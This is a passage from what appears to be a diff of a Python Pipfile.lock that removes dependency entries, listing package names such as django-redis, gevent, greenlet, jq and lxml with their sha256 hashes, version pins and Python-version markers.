"sha256:20dc5ccb516a4e7163593fd4026f0a7531e3027b47d23ebe3bd9dbc99ac4354c", - "sha256:d1b8671e79d1de6e3dd1a9c69566222b0bfcfacca8b90511a4407b2d0d3d2778" - ], - "index": "pypi", - "version": "==3.17.0" - }, - "django-import-export": { - "hashes": [ - "sha256:c39c003bfc803fb63ba7742562f1667603a4a8d7426261845d75ce8582d40f48", - "sha256:cf6f3dabdd4f32dcb26e25c7ddcba7aee3168b55d380b0da79f0349afa17c011" - ], - "index": "pypi", - "version": "==2.5.0" - }, - "django-mock-queries": { - "hashes": [ - "sha256:7ee3f34752e8131479924ea6952fe37c4106cc18e6fc3e5e9b28b333eeda10b3" - ], - "index": "pypi", - "version": "==v2.1.7" - }, - "django-modeltranslation": { - "hashes": [ - "sha256:e247840b9038b7e7b2dc6f1b4868dfe88737540883eaed3d4b4775e5bd89c7fd" - ], - "index": "pypi", - "version": "==0.17.7" - }, - "django-prometheus": { - "hashes": [ - "sha256:cf9b26f7ba2e4568f08f8f91480a2882023f5908579681bcf06a4d2465f12168", - "sha256:f9c8b6c780c9419ea01043c63a437d79db2c33353451347894408184ad9c3e1e" - ], - "index": "pypi", - "version": "==2.3.1" - }, - "django-ranged-response": { - "hashes": [ - "sha256:f71fff352a37316b9bead717fc76e4ddd6c9b99c4680cdf4783b9755af1cf985" - ], - "index": "pypi", - "version": "==0.2.0" - }, - "django-redis": { - "hashes": [ - "sha256:1d037dc02b11ad7aa11f655d26dac3fb1af32630f61ef4428860a2e29ff92026", - "sha256:8a99e5582c79f894168f5865c52bd921213253b7fd64d16733ae4591564465de" - ], - "index": "pypi", - "version": "==5.2.0" - }, - "django-rest-framework-proxy": { - "hashes": [ - "sha256:f5154c525c851f98680a960f43526de98af545e1cb9b4cfaa08a230fb7f1e58d" - ], - "index": "pypi", - "version": "==1.6.0" - }, - "django-seriously": { - "hashes": [ - "sha256:3143c6d397ac82803a8890247c52466a70863c8dbb59065888ebd2c6d10cec8c", - "sha256:e20e06b33894cfd8d58370aca9a0c8a991080d71186a841454a16dc192b66a53" - ], - "index": "pypi", - "version": "==0.4.0" - }, - "django-silk": { - "hashes": [ - "sha256:2f1fcaaf21192011147537fe1ca72dc9f552f32d7043ebd82aeeda370f194469", - "sha256:50552f06d9306d06517fbeab9a2c74856355e06304f03ed16b6dd353f7c77e7a" - ], - "index": "pypi", - "version": "==5.0.3" - }, - "django-simple-captcha": { - "hashes": [ - "sha256:567ad84fa64c86508c679b8425cc1410c44b3cd6467e54f8d31cf077d9366407", - "sha256:6e1fcc4f4005f7d69ee7a2e59a7e863b5d3918f36a85a4d811498984aecc48ce" - ], - "index": "pypi", - "version": "==0.5.18" - }, - "django-stubs": { - "extras": [ - "compatible-mypy" - ], - "hashes": [ - "sha256:0bbf9eb172c5b06eccff2d704c7c3906e4a2c6146df8c32ee9f3a51e29265581", - "sha256:25010658acac0ce4a69211b55dd719fd16dbfe54fcfe5c878d0c8db07bdd5482" - ], - "index": "pypi", - "version": "==1.15.0" - }, - "django-stubs-ext": { - "hashes": [ - "sha256:c69d1cc46f1c4c3b7894b685a5022c29b2a36c7cfb52e23762eaf357ebfc2c98", - "sha256:fdacc65a14d2d4b97334b58ff178a5853ec8c8c76cec406e417916ad67536ce4" - ], - "markers": "python_version >= '3.8'", - "version": "==4.2.2" - }, - "django-timezone-field": { - "hashes": [ - "sha256:5dd5bd9249382bef8847d3e7e4c32b7be182a4b538f354130d1252ed228892f8", - "sha256:7552d2b0f145684b7de3fb5046101c7efd600cc6ba951b15c630fa1e1b83558e" - ], - "markers": "python_version >= '3.5'", - "version": "==4.2.3" - }, - "django-utils": { - "hashes": [ - "sha256:98b59b368d499b4d1b6dc66f15c0a136833bea12e0b299efdbfd754dc04c79d5" - ], - "index": "pypi", - "version": "==0.0.2" - }, - "django-utils-six": { - "hashes": [ - "sha256:4ef9d20de679a5b2448429476452493661fe08f23d6e788a8e9816ec05e3c5b0", - "sha256:8f0e77289d911069a6a15bab5a25ccf2c0fcb8fc4177461dd17470cfdeb94aa6" - ], - "index": "pypi", - "version": "==2.0" - }, - "django-xff": { - "hashes": [ - "sha256:8935dce34383d65b545564a3cc17dc8010c8cdec231b0932e6073ddc766d679d", - "sha256:d2a34e947e730d0c899b6386b28cf675edafa9d64336cdb8c9656b0a58ed80b6", - "sha256:fc87333f64d2ff2ce4ab6449e814240f9f195c290d2c8789ca81a1c98f5522ec" - ], - "index": "pypi", - "version": "==1.4.0" - }, - "djangorestframework": { - "hashes": [ - "sha256:6d1d59f623a5ad0509fe0d6bfe93cbdfe17b8116ebc8eda86d45f6e16e819aaf", - "sha256:f747949a8ddac876e879190df194b925c177cdeb725a099db1460872f7c0a7f2" - ], - "index": "pypi", - "version": "==3.12.4" - }, - "djangorestframework-dataclasses": { - "hashes": [ - "sha256:4fa8d93a19a3e256487674e9c654b45992bc76de155bd097eced6fe4af4100a2", - "sha256:e4f54a2a21b6dfdb07ba657f91b5a97a41d03c6760203e8a6c3749276d3f129c" - ], - "index": "pypi", - "version": "==1.2.0" - }, - "djangorestframework-stubs": { - "extras": [ - "compatible-mypy" - ], - "hashes": [ - "sha256:89f6c2add193cb5ab61b9e47187b33a93cc099376a8df5e4d6c3fc8ecb992d3b", - "sha256:9475e1374b057ffbdcaaa84a060fe5f01476d8b9014d82a83b4153f57fbcbc1f" - ], - "index": "pypi", - "version": "==1.9.1" - }, - "docxcompose": { - "hashes": [ - "sha256:b1a40d4f95751565822350174971012875f82a32b83a9d1be098edd965047029" - ], - "index": "pypi", - "version": "==1.3.4" - }, - "docxtpl": { - "hashes": [ - "sha256:6ce60f38ce01d1698932bfba5c8b02e14c2cbdfb13c1c1fa15c30c433d88982d", - "sha256:a18e33e2e25a4c63d49cd76a3f1e495e53eb96062ecbc7715a8d8f4540c3195b" - ], - "index": "pypi", - "version": "==0.16.0" - }, - "drf-spectacular": { - "hashes": [ - "sha256:17ac5e31e5d6150dd5fa10843b429202f4f38069202acc44394cc5a771de63d9", - "sha256:866e16ddaae167a1234c76cd8c351161373551db994ce9665b347b32d5daf38b" - ], - "index": "pypi", - "version": "==0.22.1" - }, - "elasticsearch": { - "hashes": [ - "sha256:555170b4e13a823f4472bc12a148aef90febd5b90b16be83651d35524f34acb3", - "sha256:ed9c0cd58e05959a56e306ecf444f794da6afde75b213e26758f7a317e5e668c" - ], - "index": "pypi", - "version": "==7.17.7" - }, - "elasticsearch-dsl": { - "hashes": [ - "sha256:07ee9c87dc28cc3cae2daa19401e1e18a172174ad9e5ca67938f752e3902a1d5", - "sha256:97f79239a252be7c4cce554c29e64695d7ef6a4828372316a5e5ff815e7a7498" - ], - "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3'", - "version": "==7.4.1" - }, - "et-xmlfile": { - "hashes": [ - "sha256:8eb9e2bc2f8c97e37a2dc85a09ecdcdec9d8a396530a6d5a33b30b9a92da0c5c", - "sha256:a2ba85d1d6a74ef63837eed693bcb89c3f752169b0e3e7ae5b16ca5e1b3deada" - ], - "markers": "python_version >= '3.6'", - "version": "==1.1.0" - }, - "flower": { - "hashes": [ - "sha256:5657785d728a54914256c34fd0551fe2d7152aab08062ebc645bf86b97b8aec5", - "sha256:571f9ed1c57a622e862de35eceb8a4244f023fbcfb7175f53e45ebe679f46d90" - ], - "index": "pypi", - "version": "==2.0.0" - }, - "gevent": { - "hashes": [ - "sha256:018f93de7d5318d2fb440f846839a4464738468c3476d5c9cf7da45bb71c18bd", - "sha256:0d581f22a5be6281b11ad6309b38b18f0638cf896931223cbaa5adb904826ef6", - "sha256:1472012493ca1fac103f700d309cb6ef7964dcdb9c788d1768266e77712f5e49", - "sha256:172caa66273315f283e90a315921902cb6549762bdcb0587fd60cb712a9d6263", - "sha256:17b68f4c9e20e47ad49fe797f37f91d5bbeace8765ce2707f979a8d4ec197e4d", - "sha256:1ca01da176ee37b3527a2702f7d40dbc9ffb8cfc7be5a03bfa4f9eec45e55c46", - "sha256:1d543c9407a1e4bca11a8932916988cfb16de00366de5bf7bc9e7a3f61e60b18", - "sha256:1e1286a76f15b5e15f1e898731d50529e249529095a032453f2c101af3fde71c", - "sha256:1e955238f59b2947631c9782a713280dd75884e40e455313b5b6bbc20b92ff73", - "sha256:1f001cac0ba8da76abfeb392a3057f81fab3d67cc916c7df8ea977a44a2cc989", - "sha256:1ff3796692dff50fec2f381b9152438b221335f557c4f9b811f7ded51b7a25a1", - "sha256:2929377c8ebfb6f4d868d161cd8de2ea6b9f6c7a5fcd4f78bcd537319c16190b", - "sha256:319d8b1699b7b8134de66d656cd739b308ab9c45ace14d60ae44de7775b456c9", - "sha256:323b207b281ba0405fea042067fa1a61662e5ac0d574ede4ebbda03efd20c350", - "sha256:3b7eae8a0653ba95a224faaddf629a913ace408edb67384d3117acf42d7dcf89", - "sha256:4114f0f439f0b547bb6f1d474fee99ddb46736944ad2207cef3771828f6aa358", - "sha256:4197d423e198265eef39a0dea286ef389da9148e070310f34455ecee8172c391", - "sha256:494c7f29e94df9a1c3157d67bb7edfa32a46eed786e04d9ee68d39f375e30001", - "sha256:4e2f008c82dc54ec94f4de12ca6feea60e419babb48ec145456907ae61625aa4", - "sha256:53ee7f170ed42c7561fe8aff5d381dc9a4124694e70580d0c02fba6aafc0ea37", - "sha256:54f4bfd74c178351a4a05c5c7df6f8a0a279ff6f392b57608ce0e83c768207f9", - "sha256:58898dbabb5b11e4d0192aae165ad286dc6742c543e1be9d30dc82753547c508", - "sha256:59b47e81b399d49a5622f0f503c59f1ce57b7705306ea0196818951dfc2f36c8", - "sha256:5aa99e4882a9e909b4756ee799c6fa0f79eb0542779fad4cc60efa23ec1b2aa8", - "sha256:6c04ee32c11e9fcee47c1b431834878dc987a7a2cc4fe126ddcae3bad723ce89", - "sha256:84c517e33ed604fa06b7d756dc0171169cc12f7fdd68eb7b17708a62eebf4516", - "sha256:8729129edef2637a8084258cb9ec4e4d5ca45d97ac77aa7a6ff19ccb530ab731", - "sha256:877abdb3a669576b1d51ce6a49b7260b2a96f6b2424eb93287e779a3219d20ba", - "sha256:8c192d2073e558e241f0b592c1e2b34127a4481a5be240cad4796533b88b1a98", - "sha256:8f2477e7b0a903a01485c55bacf2089110e5f767014967ba4b287ff390ae2638", - "sha256:96c56c280e3c43cfd075efd10b250350ed5ffd3c1514ec99a080b1b92d7c8374", - "sha256:97cd42382421779f5d82ec5007199e8a84aa288114975429e4fd0a98f2290f10", - "sha256:98bc510e80f45486ef5b806a1c305e0e89f0430688c14984b0dbdec03331f48b", - "sha256:990d7069f14dc40674e0d5cb43c68fd3bad8337048613b9bb94a0c4180ffc176", - "sha256:9d85574eb729f981fea9a78998725a06292d90a3ed50ddca74530c3148c0be41", - "sha256:a2237451c721a0f874ef89dbb4af4fdc172b76a964befaa69deb15b8fff10f49", - "sha256:a47a4e77e2bc668856aad92a0b8de7ee10768258d93cd03968e6c7ba2e832f76", - "sha256:a5488eba6a568b4d23c072113da4fc0feb1b5f5ede7381656dc913e0d82204e2", - "sha256:ae90226074a6089371a95f20288431cd4b3f6b0b096856afd862e4ac9510cddd", - "sha256:b43d500d7d3c0e03070dee813335bb5315215aa1cf6a04c61093dfdd718640b3", - "sha256:b6c144e08dfad4106effc043a026e5d0c0eff6ad031904c70bf5090c63f3a6a7", - "sha256:d21ad79cca234cdbfa249e727500b0ddcbc7adfff6614a96e6eaa49faca3e4f2", - "sha256:d82081656a5b9a94d37c718c8646c757e1617e389cdc533ea5e6a6f0b8b78545", - "sha256:da4183f0b9d9a1e25e1758099220d32c51cc2c6340ee0dea3fd236b2b37598e4", - "sha256:db562a8519838bddad0c439a2b12246bab539dd50e299ea7ff3644274a33b6a5", - "sha256:ddaa3e310a8f1a45b5c42cf50b54c31003a3028e7d4e085059090ea0e7a5fddd", - "sha256:ed7f16613eebf892a6a744d7a4a8f345bc6f066a0ff3b413e2479f9c0a180193", - "sha256:efc003b6c1481165af61f0aeac248e0a9ac8d880bb3acbe469b448674b2d5281", - "sha256:f01c9adbcb605364694b11dcd0542ec468a29ac7aba2fb5665dc6caf17ba4d7e", - "sha256:f23d0997149a816a2a9045af29c66f67f405a221745b34cefeac5769ed451db8", - "sha256:f3329bedbba4d3146ae58c667e0f9ac1e6f1e1e6340c7593976cdc60aa7d1a47", - "sha256:f7ed2346eb9dc4344f9cb0d7963ce5b74fe16fdd031a2809bb6c2b6eba7ebcd5" - ], - "index": "pypi", - "version": "==22.10.2" - }, - "gprof2dot": { - "hashes": [ - "sha256:45b4d298bd36608fccf9511c3fd88a773f7a1abc04d6cd39445b11ba43133ec5", - "sha256:f165b3851d3c52ee4915eb1bd6cca571e5759823c2cd0f71a79bda93c2dc85d6" - ], - "markers": "python_version >= '2.7'", - "version": "==2022.7.29" - }, - "greenlet": { - "hashes": [ - "sha256:03a8f4f3430c3b3ff8d10a2a86028c660355ab637cee9333d63d66b56f09d52a", - "sha256:0bf60faf0bc2468089bdc5edd10555bab6e85152191df713e2ab1fcc86382b5a", - "sha256:18a7f18b82b52ee85322d7a7874e676f34ab319b9f8cce5de06067384aa8ff43", - "sha256:18e98fb3de7dba1c0a852731c3070cf022d14f0d68b4c87a19cc1016f3bb8b33", - "sha256:1a819eef4b0e0b96bb0d98d797bef17dc1b4a10e8d7446be32d1da33e095dbb8", - "sha256:26fbfce90728d82bc9e6c38ea4d038cba20b7faf8a0ca53a9c07b67318d46088", - "sha256:2780572ec463d44c1d3ae850239508dbeb9fed38e294c68d19a24d925d9223ca", - "sha256:283737e0da3f08bd637b5ad058507e578dd462db259f7f6e4c5c365ba4ee9343", - "sha256:2d4686f195e32d36b4d7cf2d166857dbd0ee9f3d20ae349b6bf8afc8485b3645", - "sha256:2dd11f291565a81d71dab10b7033395b7a3a5456e637cf997a6f33ebdf06f8db", - "sha256:30bcf80dda7f15ac77ba5af2b961bdd9dbc77fd4ac6105cee85b0d0a5fcf74df", - "sha256:32e5b64b148966d9cccc2c8d35a671409e45f195864560829f395a54226408d3", - "sha256:36abbf031e1c0f79dd5d596bfaf8e921c41df2bdf54ee1eed921ce1f52999a86", - "sha256:3a06ad5312349fec0ab944664b01d26f8d1f05009566339ac6f63f56589bc1a2", - "sha256:3a51c9751078733d88e013587b108f1b7a1fb106d402fb390740f002b6f6551a", - "sha256:3c9b12575734155d0c09d6c3e10dbd81665d5c18e1a7c6597df72fd05990c8cf", - "sha256:3f6ea9bd35eb450837a3d80e77b517ea5bc56b4647f5502cd28de13675ee12f7", - "sha256:4b58adb399c4d61d912c4c331984d60eb66565175cdf4a34792cd9600f21b394", - "sha256:4d2e11331fc0c02b6e84b0d28ece3a36e0548ee1a1ce9ddde03752d9b79bba40", - "sha256:5454276c07d27a740c5892f4907c86327b632127dd9abec42ee62e12427ff7e3", - "sha256:561091a7be172ab497a3527602d467e2b3fbe75f9e783d8b8ce403fa414f71a6", - "sha256:6c3acb79b0bfd4fe733dff8bc62695283b57949ebcca05ae5c129eb606ff2d74", - "sha256:703f18f3fda276b9a916f0934d2fb6d989bf0b4fb5a64825260eb9bfd52d78f0", - "sha256:7492e2b7bd7c9b9916388d9df23fa49d9b88ac0640db0a5b4ecc2b653bf451e3", - "sha256:76ae285c8104046b3a7f06b42f29c7b73f77683df18c49ab5af7983994c2dd91", - "sha256:7cafd1208fdbe93b67c7086876f061f660cfddc44f404279c1585bbf3cdc64c5", - "sha256:7efde645ca1cc441d6dc4b48c0f7101e8d86b54c8530141b09fd31cef5149ec9", - "sha256:88d9ab96491d38a5ab7c56dd7a3cc37d83336ecc564e4e8816dbed12e5aaefc8", - "sha256:8eab883b3b2a38cc1e050819ef06a7e6344d4a990d24d45bc6f2cf959045a45b", - "sha256:910841381caba4f744a44bf81bfd573c94e10b3045ee00de0cbf436fe50673a6", - "sha256:9190f09060ea4debddd24665d6804b995a9c122ef5917ab26e1566dcc712ceeb", - "sha256:937e9020b514ceedb9c830c55d5c9872abc90f4b5862f89c0887033ae33c6f73", - "sha256:94c817e84245513926588caf1152e3b559ff794d505555211ca041f032abbb6b", - "sha256:971ce5e14dc5e73715755d0ca2975ac88cfdaefcaab078a284fea6cfabf866df", - "sha256:9d14b83fab60d5e8abe587d51c75b252bcc21683f24699ada8fb275d7712f5a9", - "sha256:9f35ec95538f50292f6d8f2c9c9f8a3c6540bbfec21c9e5b4b751e0a7c20864f", - "sha256:a1846f1b999e78e13837c93c778dcfc3365902cfb8d1bdb7dd73ead37059f0d0", - "sha256:acd2162a36d3de67ee896c43effcd5ee3de247eb00354db411feb025aa319857", - "sha256:b0ef99cdbe2b682b9ccbb964743a6aca37905fda5e0452e5ee239b1654d37f2a", - "sha256:b80f600eddddce72320dbbc8e3784d16bd3fb7b517e82476d8da921f27d4b249", - "sha256:b864ba53912b6c3ab6bcb2beb19f19edd01a6bfcbdfe1f37ddd1778abfe75a30", - "sha256:b9ec052b06a0524f0e35bd8790686a1da006bd911dd1ef7d50b77bfbad74e292", - "sha256:ba2956617f1c42598a308a84c6cf021a90ff3862eddafd20c3333d50f0edb45b", - "sha256:bdfea8c661e80d3c1c99ad7c3ff74e6e87184895bbaca6ee8cc61209f8b9b85d", - "sha256:be4ed120b52ae4d974aa40215fcdfde9194d63541c7ded40ee12eb4dda57b76b", - "sha256:c4302695ad8027363e96311df24ee28978162cdcdd2006476c43970b384a244c", - "sha256:c48f54ef8e05f04d6eff74b8233f6063cb1ed960243eacc474ee73a2ea8573ca", - "sha256:c9c59a2120b55788e800d82dfa99b9e156ff8f2227f07c5e3012a45a399620b7", - "sha256:cd021c754b162c0fb55ad5d6b9d960db667faad0fa2ff25bb6e1301b0b6e6a75", - "sha256:d27ec7509b9c18b6d73f2f5ede2622441de812e7b1a80bbd446cb0633bd3d5ae", - "sha256:d5508f0b173e6aa47273bdc0a0b5ba055b59662ba7c7ee5119528f466585526b", - "sha256:d75209eed723105f9596807495d58d10b3470fa6732dd6756595e89925ce2470", - "sha256:db1a39669102a1d8d12b57de2bb7e2ec9066a6f2b3da35ae511ff93b01b5d564", - "sha256:dbfcfc0218093a19c252ca8eb9aee3d29cfdcb586df21049b9d777fd32c14fd9", - "sha256:e0f72c9ddb8cd28532185f54cc1453f2c16fb417a08b53a855c4e6a418edd099", - "sha256:e7c8dc13af7db097bed64a051d2dd49e9f0af495c26995c00a9ee842690d34c0", - "sha256:ea9872c80c132f4663822dd2a08d404073a5a9b5ba6155bea72fb2a79d1093b5", - "sha256:eff4eb9b7eb3e4d0cae3d28c283dc16d9bed6b193c2e1ace3ed86ce48ea8df19", - "sha256:f82d4d717d8ef19188687aa32b8363e96062911e63ba22a0cff7802a8e58e5f1", - "sha256:fc3a569657468b6f3fb60587e48356fe512c1754ca05a564f11366ac9e306526" - ], - "markers": "platform_python_implementation == 'CPython'", - "version": "==2.0.2" - }, - "gunicorn": { - "hashes": [ - "sha256:9dcc4547dbb1cb284accfb15ab5667a0e5d1881cc443e0677b4882a4067a807e", - "sha256:e0a968b5ba15f8a328fdfd7ab1fcb5af4470c28aaf7e55df02a99bc13138e6e8" - ], - "index": "pypi", - "version": "==20.1.0" - }, - "humanize": { - "hashes": [ - "sha256:8bc9e2bb9315e61ec06bf690151ae35aeb65651ab091266941edf97c90836404", - "sha256:9783373bf1eec713a770ecaa7c2d7a7902c98398009dfa3d8a2df91eec9311e8" - ], - "markers": "python_version >= '3.8'", - "version": "==4.8.0" - }, - "id-validator": { - "hashes": [ - "sha256:90b73b89f807f8b387beaa7f1f86baa4a64fa5674df5db9ab1a7362433f8e3b8" - ], - "index": "pypi", - "version": "==1.0.20" - }, - "idna": { - "hashes": [ - "sha256:b307872f855b18632ce0c21c5e45be78c0ea7ae4c15c828c20788b26921eb3f6", - "sha256:b97d804b1e9b523befed77c48dacec60e6dcb0b5391d57af6a65a312a90648c0" - ], - "index": "pypi", - "version": "==2.10" - }, - "inflection": { - "hashes": [ - "sha256:1a29730d366e996aaacffb2f1f1cb9593dc38e2ddd30c91250c6dde09ea9b417", - "sha256:f38b2b640938a4f35ade69ac3d053042959b62a0f1076a5bbaa1b9526605a8a2" - ], - "markers": "python_version >= '3.5'", - "version": "==0.5.1" - }, - "jinja2": { - "hashes": [ - "sha256:31351a702a408a9e7595a8fc6150fc3f43bb6bf7e319770cbc0db9df9437e852", - "sha256:6088930bfe239f0e6710546ab9c19c9ef35e29792895fed6e6e31a023a182a61" - ], - "markers": "python_version >= '3.7'", - "version": "==3.1.2" - }, - "jmespath": { - "hashes": [ - "sha256:b85d0567b8666149a93172712e68920734333c0ce7e89b78b3e987f71e5ed4f9", - "sha256:cdf6525904cc597730141d61b36f2e4b8ecc257c420fa2f4549bac2c2d0cb72f" - ], - "markers": "python_version >= '2.6' and python_version not in '3.0, 3.1, 3.2, 3.3'", - "version": "==0.10.0" - }, - "jq": { - "hashes": [ - "sha256:0015b80570b38176f5ac22049b957d4f34ee8030f6ee89955f95bce4bfff8451", - "sha256:028604640ba281c2bc5fa1b4284078d4d56d9431c96b6f71715fd801a3d2cdfb", - "sha256:05d44bdf6a97ad4866ad099fed5297214a58e1e3e56657be41495c69ce74aa11", - "sha256:06d02868ec10cf1e744fda3ec1b6928eb2a05fbbb3b52383c85285d52e8e000a", - "sha256:0d8c8a0e7bc6f738e482472b4fbb6be97eab707924661782e90c378327688b29", - "sha256:0dc8ca9e2ea1afc8e856e92eee70f6ab728342d1c071c741b2047d5c08961d8a", - "sha256:118070043a369378feadf22f091e57b4054b3325ccdc248e1f19c8586bfe9e6f", - "sha256:11d6e7c98efcb38b95481687310ed0ec7f230cc8916ac1c054827552f45ece5d", - "sha256:150aeaa02d57fc9c4966c7af8c6c2a9c6736f82a798c7bc72b44dd7970f1f8d8", - "sha256:1569aa11654a686be9323c9c4329d4a961dd96f9f0b9800eb3bdd939b017cb8a", - "sha256:16e28f6964b827a5170a0d7f086367601ef1d420952de81934e79cff638a6bc8", - "sha256:18bb7c70fc01f5e4739b1ac3cbab958eae881b1991615c973b9cdcfcd06ce93f", - "sha256:228c42e825007277fd01ad71f6ea93bda289fe45693b2d3649eeb87b75a6b083", - "sha256:28c6ec10c97e697ca73d1fe188c340d53ad17fc4b42fcca87570c060f9364c55", - "sha256:3c7b8f71778fb4140e923bb716caef0709e6f64d33ea369236f1d43c76d62f7a", - "sha256:4b46fe1f91423699337c5f3b1001943b911bb54a9e045a1b8d6493142f4acc45", - "sha256:4bc0680f7b4cff6a9077a288e6e166a327eb916a50041cf10d9d3df289b1e5d1", - "sha256:4edd3edde1bec54408dc14a4ab4350523e2d69c15cac58033459cff3ff814ca9", - "sha256:52cce695dafc461becee6d14889918db7cccafd6f3c28e9174042caa7e017e96", - "sha256:52ffba73a294949dfddef52a70672e3d5bc694f9e593d3cbcc115449c735e26c", - "sha256:56ea972fd697aea1658c56bd18da9d2ae2494ae9be627858a5152d70cdea75f2", - "sha256:5952b363fd44e4c2e1ceb8a88c0205699ee4eb060c34e1b590f39f3490533549", - "sha256:5ae2b94979bcd6a183aa18056bce975d5081199d83cbf914ff71aecab4e0a2d4", - "sha256:5c4e9d9cdf5e63bddeea01d1150903dcb45c3fbd028ecf4578561b0b6dddb8dc", - "sha256:673ec567be3644166a367627e8393944ce2d21b2e14dc1f4be48b2e3082ccfc2", - "sha256:6b07ad65aa9fca72b7e722585bac5a5e13280257abe9e9d5af845a003e66ff8b", - "sha256:6c427bb8f782eb4ac0326b9f65d5f002bd9a5947d9bc715e662cda659361c48c", - "sha256:71d5725dae1dd2f636fb696865a10f260610a23ea029ca7b78f2b7c033b3b148", - "sha256:75fd74d74e0f78f513fd8517d39fee591b6dc194b422e5b2d88b77899a79a2a9", - "sha256:78d13cbeb6dd512adcf2bbebf393c18e3c0b7e3e366ce7a05b46310ce2924a65", - "sha256:7b1ad8a91623fa3c5cecff9dc398eebf7e5e82ba9982f60e5ef17172d78a4ecc", - "sha256:7c09caae5a24a3216a1bb812489e1ad6bc0e2b7410853c930c272a4ab65c8667", - "sha256:8d263927eb8140c174e715da2ad8c009e65e7d3fa82b8af176744b9367aae860", - "sha256:95160aa31efde7939763c80767e85d9a34544ab87e7ed66ee13f42dbc4595d37", - "sha256:96b66f41a91c9794f8051cc32d8fd3206c6409693f0076b22eacb4faa0bc504f", - "sha256:96da9428a158fa377ec1f432e4790ce3e0640e28004aa1cb6486db374277c6a1", - "sha256:980ac3ad4fa9e61bbec4e17d0d01c7bad11decca49620d9766aff047a4043eb9", - "sha256:b3352b273e17e530de5cfbf55cdba68d6231cdf0ac10ca6baf438e41fd43e881", - "sha256:ba4afcb00c1fc8d1f0d79f0029345f91e207909fd2c125aeedbf7b4cf2c1fc84", - "sha256:bb72811aa78cf0f82d512731c47e69611168909b991b43481d2a6dc0da940835", - "sha256:bbf73f553e23f99c33463041dc04de3b5a5eefdfc35bd9e2e33ba4f7b060249e", - "sha256:d49afd3743d9703d31ed2148d9c5d8edc7bf1c894688f4c72b0d9ef5e0add7b3", - "sha256:dab5daca625ba4c10c3579d55fe057b063ad609f0c0382ae6e28936d7ec8a772", - "sha256:e874298835c55e60bbf27bc21799ec64bc1305a0b1dcc4646f2755210fe43bfa", - "sha256:e97578a5e53b06481dbdf5b88e38e6dd856b53ba7bd68678ceadb50de3799fd1", - "sha256:e97850b803ea8604cd14645a63ad5863d86fdbfaf0bede0da0490c3108956bd0", - "sha256:ead1c073cf33326be15a879475e3dd8b5f5a70ccff95acafbba56ea3d231803d", - "sha256:eb28afd2e43e1ece66618381b646ff1da65fc129f0d9cc600ec224f384add061", - "sha256:ec2255c7fe76070a8ee52cc3d32a7cd7f84fca9a6048873c01b07ca1c70db295", - "sha256:ee0503d45e8b24dd4757460e7664c275aed9a6e5f4986b16a483dc11fb83c19b", - "sha256:f36e1d4837383489b0e0c2c70da06c2cb6332bca4fa864b0c7a1500abfed384a", - "sha256:fa0a8032416746edb57ea570cafc99026c2c240d8a0624c0a43631fc82cc0efa", - "sha256:fa7724caaedf6c48522a6805e4306978defc5f0d6bd6ab0d25eeb7207dae9a90", - "sha256:fd04032736f7b94d1e0720634038cc58980f5eeac7e280bbf5f70e03c7f1afd9", - "sha256:fe9fb7748e39b30b5723a7f6695e2f6c58707563b94f1239766d2c8b9550f147" - ], - "index": "pypi", - "version": "==1.3.0" - }, - "jsonlog": { - "hashes": [ - "sha256:d8964ac2f561b821a3ca21cd39849cfbe6da9fd038480e073434f51c65d38971", - "sha256:ee313731f2a8611a13e0c15cfcfbab75c524f27c8bae24eaeb7ee7a061a60c55" - ], - "index": "pypi", - "version": "==4.0.0" - }, - "jsonschema": { - "hashes": [ - "sha256:5bfcf2bca16a087ade17e02b282d34af7ccd749ef76241e7f9bd7c0cb8a9424d", - "sha256:f660066c3966db7d6daeaea8a75e0b68237a48e51cf49882087757bb59916248" - ], - "index": "pypi", - "version": "==4.17.0" - }, - "kombu": { - "hashes": [ - "sha256:48ee589e8833126fd01ceaa08f8a2041334e9f5894e5763c8486a550454551e9", - "sha256:fbd7572d92c0bf71c112a6b45163153dea5a7b6a701ec16b568c27d0fd2370f2" - ], - "markers": "python_version >= '3.8'", - "version": "==5.3.1" - }, - "lxml": { - "hashes": [ - "sha256:04da965dfebb5dac2619cb90fcf93efdb35b3c6994fea58a157a834f2f94b318", - "sha256:0538747a9d7827ce3e16a8fdd201a99e661c7dee3c96c885d8ecba3c35d1032c", - "sha256:0645e934e940107e2fdbe7c5b6fb8ec6232444260752598bc4d09511bd056c0b", - "sha256:079b68f197c796e42aa80b1f739f058dcee796dc725cc9a1be0cdb08fc45b000", - "sha256:0f3f0059891d3254c7b5fb935330d6db38d6519ecd238ca4fce93c234b4a0f73", - "sha256:10d2017f9150248563bb579cd0d07c61c58da85c922b780060dcc9a3aa9f432d", - "sha256:1355755b62c28950f9ce123c7a41460ed9743c699905cbe664a5bcc5c9c7c7fb", - "sha256:13c90064b224e10c14dcdf8086688d3f0e612db53766e7478d7754703295c7c8", - "sha256:1423631e3d51008871299525b541413c9b6c6423593e89f9c4cfbe8460afc0a2", - "sha256:1436cf0063bba7888e43f1ba8d58824f085410ea2025befe81150aceb123e345", - "sha256:1a7c59c6ffd6ef5db362b798f350e24ab2cfa5700d53ac6681918f314a4d3b94", - "sha256:1e1cf47774373777936c5aabad489fef7b1c087dcd1f426b621fda9dcc12994e", - "sha256:206a51077773c6c5d2ce1991327cda719063a47adc02bd703c56a662cdb6c58b", - "sha256:21fb3d24ab430fc538a96e9fbb9b150029914805d551deeac7d7822f64631dfc", - "sha256:27e590352c76156f50f538dbcebd1925317a0f70540f7dc8c97d2931c595783a", - "sha256:287605bede6bd36e930577c5925fcea17cb30453d96a7b4c63c14a257118dbb9", - "sha256:2aaf6a0a6465d39b5ca69688fce82d20088c1838534982996ec46633dc7ad6cc", - "sha256:32a73c53783becdb7eaf75a2a1525ea8e49379fb7248c3eeefb9412123536387", - "sha256:41fb58868b816c202e8881fd0f179a4644ce6e7cbbb248ef0283a34b73ec73bb", - "sha256:4780677767dd52b99f0af1f123bc2c22873d30b474aa0e2fc3fe5e02217687c7", - "sha256:4878e667ebabe9b65e785ac8da4d48886fe81193a84bbe49f12acff8f7a383a4", - "sha256:487c8e61d7acc50b8be82bda8c8d21d20e133c3cbf41bd8ad7eb1aaeb3f07c97", - "sha256:4beea0f31491bc086991b97517b9683e5cfb369205dac0148ef685ac12a20a67", - "sha256:4cfbe42c686f33944e12f45a27d25a492cc0e43e1dc1da5d6a87cbcaf2e95627", - "sha256:4d5bae0a37af799207140652a700f21a85946f107a199bcb06720b13a4f1f0b7", - "sha256:4e285b5f2bf321fc0857b491b5028c5f276ec0c873b985d58d7748ece1d770dd", - "sha256:57e4d637258703d14171b54203fd6822fda218c6c2658a7d30816b10995f29f3", - 